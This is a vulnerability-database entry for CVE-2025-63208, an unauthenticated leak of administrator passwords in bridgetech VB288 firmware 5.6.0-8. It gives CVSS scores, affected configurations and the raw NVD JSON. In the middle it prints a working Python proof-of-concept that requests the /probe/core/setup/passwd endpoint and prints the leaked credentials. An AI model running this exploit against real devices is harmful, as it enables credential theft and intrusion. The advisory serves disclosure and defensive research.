Security Vulnerability Report
中文
CVE-2025-63208 CVSS 7.5 HIGH

CVE-2025-63208

Published: 2025-11-19 18:15:49
Last Modified: 2026-01-15 21:52:52

Description

An issue was discovered in bridgetech VB288 Objective QoE Content Extractor, firmware version 5.6.0-8, allowing attackers to gain sensitive information such as administrator passwords via the /probe/core/setup/passwd endpoint.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:bridgetech:vb288_firmware:5.6.0-8:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:bridgetech:vb288:-:*:*:*:*:*:*:* - NOT VULNERABLE
bridgetech VB288 Objective QoE Content Extractor 固件版本 5.6.0-8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-63208 PoC - Information Disclosure in bridgetech VB288 # Target: /probe/core/setup/passwd endpoint target_ip = "192.168.1.100" # Replace with target IP target_port = 8080 url = f"http://{target_ip}:{target_port}/probe/core/setup/passwd" print(f"[*] Exploiting CVE-2025-63208 on {target_ip}") print(f"[*] Target URL: {url}") try: # Send unauthenticated request to leak admin credentials response = requests.get(url, timeout=10) print(f"[*] Status Code: {response.status_code}") if response.status_code == 200: print("[+] SUCCESS: Sensitive information leaked!") print("\n[+] Leaked Data:") print(response.text) # Parse and display credentials if possible try: data = response.json() print("\n[+] Parsed Credentials:") print(json.dumps(data, indent=2)) except: print("\n[+] Raw Response:") print(response.text) else: print(f"[-] Failed: Status code {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63208", "sourceIdentifier": "[email protected]", "published": "2025-11-19T18:15:48.933", "lastModified": "2026-01-15T21:52:52.163", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in bridgetech VB288 Objective QoE Content Extractor, firmware version 5.6.0-8, allowing attackers to gain sensitive information such as administrator passwords via the /probe/core/setup/passwd endpoint."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-312"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:bridgetech:vb288_firmware:5.6.0-8:*:*:*:*:*:*:*", "matchCriteriaId": "5305127F-A790-414E-841B-EFB08726E98F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:bridgetech:vb288:-:*:*:*:*:*:*:*", "matchCriteriaId": "8BC8CF9F-7583-4111-8FAE-C9F2B6F726DF"}]}]}], "references": [{"url": "https://bridgetech.tv/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63208_bridgetech%20VB288%20Information%20Disclosure", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}